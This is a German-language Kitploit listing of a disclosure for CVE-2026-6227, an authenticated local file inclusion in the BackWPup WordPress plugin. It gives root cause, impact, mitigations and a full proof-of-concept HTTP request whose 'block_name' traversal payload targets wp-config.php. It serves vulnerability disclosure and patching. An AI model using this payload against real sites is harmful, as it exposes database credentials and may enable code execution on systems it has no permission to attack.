Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6227 — Bildungs-PoC für CVE-2026-6227, eine authentifizierte Local File Inclusion im WordPress-Plugin BackWPup, einschließlich Root-Cause-Analyse, Exploit-Request und Mitigationshinweisen. | Kitploit
Tools/GitHubGitHub/pixel-defaultbr/cve-2026-6227
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Bildungs-PoC für CVE-2026-6227, eine authentifizierte Local File Inclusion im WordPress-Plugin BackWPup, einschließlich Root-Cause-Analyse, Exploit-Request und Mitigationshinweisen.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-6227: Lokale Dateieinbindung (Local File Inclusion) in BackWPup

CVSS Version Researcher

Advisory-Zusammenfassung

BackWPup-Versionen bis einschließlich 5.6.6 sind von einer authentifizierten Schwachstelle zur lokalen Dateieinbindung (Local File Inclusion, LFI) über den Parameter block_name des REST-Endpunkts /wp-json/backwpup/v1/getblock betroffen.

Der Fehler wurde durch eine nicht-rekursive str_replace()-Bereinigung von Traversal-Sequenzen verursacht und ist bereits in Version 5.6.7 behoben.

Metadaten

  • CVE: CVE-2026-6227
  • Schweregrad: Hoch
  • CVSS-Score: 7.2
  • Betroffenes Produkt: BackWPup WordPress-Plugin
  • Betroffene Versionen: <= 5.6.6
  • Behobene Version: 5.6.7
  • Status: Gepatcht
  • Offenlegungsdatum: 2026-04-13
  • Forscher: Pixel_DefaultBR
  • Haftungsausschluss

    Dieses Repository dient ausschließlich Bildungs- und ethischen Sicherheitsforschungszwecken. Die hier bereitgestellten Informationen sollen Administratoren und Sicherheitsteams dabei helfen, ihre Systeme zu überprüfen. Verwenden Sie diese nicht gegen Ziele ohne ausdrückliche, schriftliche Genehmigung.

    Betroffene Oberfläche

    • Funktion: BackWPupHelpers::component()
    • Endpunkt: POST /wp-json/backwpup/v1/getblock
    • Parameter: block_name
    • Zugriffsebene: Authentifizierter Administrator (oder Benutzer mit delegierten Backup-Berechtigungen)

    Ursachenanalyse

    Der anfällige Komponenten-Loader wendet vor dem Aufruf von include() eine nicht-rekursive str_replace()-Bereinigung an. Diese kann mit konstruierten Traversal-Mustern wie ....// oder ..././ umgangen werden, wodurch eine angreiferkontrollierte Pfadauflösung ermöglicht wird.

    Auswirkungen

    • Einbindung beliebiger lokaler PHP-Dateien vom Server-Dateisystem
    • Mögliche Offenlegung sensibler Daten (z. B. wp-config.php)
    • Mögliche Remote-Codeausführung bei bestimmten Server-/Anwendungskonfigurationen

    Standardmäßig erfordert die Ausnutzung Administratorzugriff. Wenn Backup-Berechtigungen delegiert werden, könnten auch Benutzer mit geringeren Rechten diese Schwachstelle ausnutzen.

    Voraussetzungen für die Ausnutzung

    • Gültige authentifizierte WordPress-Sitzung
    • Gültiges REST-Nonce
    • Administratorrechte oder delegierte Backup-Berechtigungen

    Proof of Concept

    Szenario: Lokale Dateieinbindung

    1. Melden Sie sich bei WordPress mit einem Konto an, das über die BackWPup-Job-Fähigkeit verfügt.
    2. Lösen Sie eine normale Anfrage über die Plugin-Oberfläche aus und fangen Sie den Datenverkehr mit einem Proxy ab.
    3. Suchen Sie eine legitime POST-Anfrage an /wp-json/backwpup/v1/getblock.
    4. Ersetzen Sie block_name durch eine Traversal-Payload.

    Beispielanfrage:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. Beobachten Sie die Antwort, um das Verhalten der Dateieinbindung zu verifizieren.

    Zeitplan

    • 2026-03: Schwachstelle an den Hersteller gemeldet
    • 2026-03-25: Hersteller-Patch in 5.6.7 veröffentlicht
    • 2026-04-13: Öffentliche Offenlegung (CVE-2026-6227)

    Gegenmaßnahmen

    • Aktualisieren Sie BackWPup auf Version 5.6.7 oder höher
    • Beschränken Sie die Zuweisung der backwpup-Fähigkeit auf vertrauenswürdige Rollen
    • Überprüfen Sie Audit-Logs auf verdächtige Zugriffe auf /wp-json/backwpup/v1/getblock

    Referenzen

    • Hersteller-Plugin-Seite: https://wordpress.org/plugins/backwpup/
    • CVE-Referenz (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    Tool herunterladen